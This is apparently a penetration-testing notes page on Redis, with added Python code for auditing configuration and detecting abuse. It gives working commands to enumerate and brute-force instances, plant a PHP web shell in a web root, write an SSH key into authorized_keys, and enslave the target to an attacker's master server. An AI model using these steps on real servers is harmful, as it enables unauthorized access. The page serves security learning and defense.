Redis

Introduction

Redis allows you to store data in memory for fast retrieval.

It is basically a cache server that allows for quicker access to data. It is commonly used for caching database queries that are large and take a long time to retrieve from the database.

Enumeration

Nmap

nmap -sV -p 6379 --script redis-info <IP>

The nmap script does not work under some circumstances and needs to be updated: https://github.com/nmap/nmap/issues/2296

Updated version: https://raw.githubusercontent.com/jjunqueira/nmap/master/scripts/redis-info.nse

Brute Forcing:

nmap -sV -p 6379 --script redis-brute <IP>

redis-cli

This may need to be installed.

redis-cli -h <IP>

Good enumeration commands:

info
client list
config get *
monitor
slowlog get 25
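As an added defensive check (example code written for this page, not part of the original notes or of Redis itself), the following Python parses the numbered reply that redis-cli prints for `config get *` and flags the settings that the techniques later on this page depend on: no password, protected mode off, listening on every interface, and a dump directory or filename that has been pointed somewhere other than the Redis data directory. The sample output is constructed, and the directory prefixes treated as suspicious are an assumption chosen for illustration.

```python
import re

# Constructed sample of `redis-cli -h <IP> config get *` output (not captured
# from any real host). redis-cli prints the reply as numbered lines that
# alternate between a parameter name and its value.
SAMPLE_CONFIG_GET = """\
 1) "dir"
 2) "/usr/share/nginx/html"
 3) "dbfilename"
 4) "redis.php"
 5) "requirepass"
 6) ""
 7) "protected-mode"
 8) "no"
 9) "bind"
10) "0.0.0.0"
11) "port"
12) "6379"
"""

# One redis-cli output line: optional spaces, a counter, ')', then a quoted value.
LINE_RE = re.compile(r'^\s*\d+\)\s+"(.*)"$')

# Assumed locations that a Redis dump should never be written to
# (web roots and home directories); adjust to the environment being audited.
SUSPICIOUS_DIR_PREFIXES = ("/var/www", "/usr/share/nginx", "/home", "/root")


def parse_config_get(text):
    """Turn redis-cli's numbered CONFIG GET output into a {parameter: value} dict."""
    values = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            values.append(m.group(1))
    # The reply is a flat list: name, value, name, value, ...
    return dict(zip(values[0::2], values[1::2]))


def audit_config(cfg):
    """Return a list of findings; an empty list means none of these checks fired."""
    findings = []
    if cfg.get("requirepass", "") == "":
        findings.append("no password set: AUTH is not required")
    if cfg.get("protected-mode", "yes") == "no":
        findings.append("protected-mode is off")
    bind = cfg.get("bind", "")
    if bind == "" or "0.0.0.0" in bind.split() or "*" in bind.split():
        findings.append(f"listening on all interfaces (bind={bind!r})")
    dbfilename = cfg.get("dbfilename", "dump.rdb")
    if not dbfilename.endswith(".rdb"):
        findings.append(f"dbfilename {dbfilename!r} is not an .rdb file")
    directory = cfg.get("dir", "")
    if directory.startswith(SUSPICIOUS_DIR_PREFIXES) or directory.endswith("/.ssh"):
        findings.append(f"dir {directory!r} is outside the normal Redis data directory")
    return findings


if __name__ == "__main__":
    for finding in audit_config(parse_config_get(SAMPLE_CONFIG_GET)):
        print("FINDING:", finding)
```

Pipe the real output in with `redis-cli -h <IP> config get * | python3 audit.py` (after replacing the sample with `sys.stdin.read()`); a healthy instance with `requirepass` set, `protected-mode yes`, `bind 127.0.0.1` and the default `dump.rdb` in `/var/lib/redis` produces no findings.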

Database Enumeration

Databases are numbered starting with 0.

select 0
keys *
get <key-name>

Redis Authentication

To authenticate, use the AUTH command:

AUTH <password>
AUTH <user> <password>

Redis may require just a password (requirepass) or, when ACLs are in use (Redis 6 and later), both a user and a password.

Redis Remote Command Execution

The techniques below come from: https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html Although the site is no longer active, these techniques are still valid.

Create a Web Shell

For this to work, you need to know the full path to where the website is being served from:

root@Urahara:~# redis-cli -h 10.85.0.52
config set dir /usr/share/nginx/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

Gain SSH Access

This requires doing some prep work before jumping onto the redis server.

1. Generate an SSH public and private key:

ssh-keygen -t rsa

2. Write the public key to another file, adding some new lines before and after:

(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > pubKey.txt

3. Import the file into redis:

cat pubKey.txt | redis-cli -h <IP> -x set crackit

It appears you need to make sure you are in a writeable directory on redis before you do the above line; otherwise, you will end up with an error.

4. Save the public key in the authorized_keys file:

root@Urahara:~# redis-cli -h <IP>
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

Master & Slave Configuration

master redis : <IP> (Hacker's Server)
slave  redis : <IP> (Target Vulnerability Server)

A master-slave connection is established between the slave redis and the master redis:

redis-cli -h <IP> -p 6379
slaveof <IP> 6379

Then you can log in to the master redis to control the slave redis:

redis-cli -h <IP> -p 6379
set mykey hello
set mykey2 helloworld
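Added example, not from the original page or the archived article it cites: detection logic in Python, run over constructed `monitor` output in the line format Redis documents (`timestamp [db client] "cmd" "arg" ...`), that flags the CONFIG SET dir/dbfilename followed by SAVE sequence used by the web shell and SSH key techniques above, and the SLAVEOF redirection from the master/slave section. The client addresses, timestamps and key names in the sample are made up.

```python
import re

# Constructed sample of `redis-cli -h <IP> monitor` output (not captured from a real host).
SAMPLE_MONITOR = [
    '1700000000.000001 [0 10.85.0.99:51234] "config" "set" "dir" "/var/lib/redis/.ssh"',
    '1700000000.000002 [0 10.85.0.99:51234] "config" "set" "dbfilename" "authorized_keys"',
    '1700000000.000003 [0 10.85.0.99:51234] "save"',
    '1700000000.000004 [0 10.85.0.99:51235] "slaveof" "10.85.0.99" "6379"',
    '1700000000.000005 [0 10.85.0.10:40000] "get" "session:42"',
    'OK',  # redis-cli prints this before the stream starts; it carries no command
]

# timestamp, then "[db client-address]", then the quoted command and arguments.
MONITOR_LINE_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$'
)
# Each argument is double-quoted; MONITOR backslash-escapes quotes inside values.
ARG_RE = re.compile(r'"((?:\\.|[^"\\])*)"')


def parse_monitor_line(line):
    """Return {ts, db, client, cmd, args} for one MONITOR line, or None if it is not one."""
    m = MONITOR_LINE_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return {
        "ts": float(m.group("ts")),
        "db": int(m.group("db")),
        "client": m.group("client"),
        "cmd": args[0].lower(),
        "args": args[1:],
    }


def detect_abuse(lines):
    """Return (client, message) alerts for dump redirection and replication takeover."""
    alerts = []
    redirected = {}  # client address -> list of "param=value" changes it made
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        cmd, args, client = ev["cmd"], ev["args"], ev["client"]
        if cmd == "config" and len(args) >= 3 and args[0].lower() == "set":
            param = args[1].lower()
            if param in ("dir", "dbfilename"):
                redirected.setdefault(client, []).append(f"{param}={args[2]}")
                alerts.append((client, f"CONFIG SET {param} {args[2]!r}: RDB output location changed"))
        elif cmd in ("save", "bgsave") and client in redirected:
            changes = ", ".join(redirected[client])
            alerts.append((client, f"{cmd.upper()} after {changes}: dump written to a non-default path"))
        elif cmd in ("slaveof", "replicaof") and args and args[0].lower() != "no":
            alerts.append((client, f"{cmd.upper()} {' '.join(args)}: instance now replicates from another host"))
    return alerts


if __name__ == "__main__":
    for client, message in detect_abuse(SAMPLE_MONITOR):
        print(f"ALERT {client}: {message}")
```

The same rules apply to a live stream (`redis-cli -h <IP> monitor | python3 detect.py` with `sys.stdin` in place of the sample); the per-client state is what ties a SAVE to the CONFIG SET that preceded it, since the SAVE on its own is a normal administrative command.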

Resources
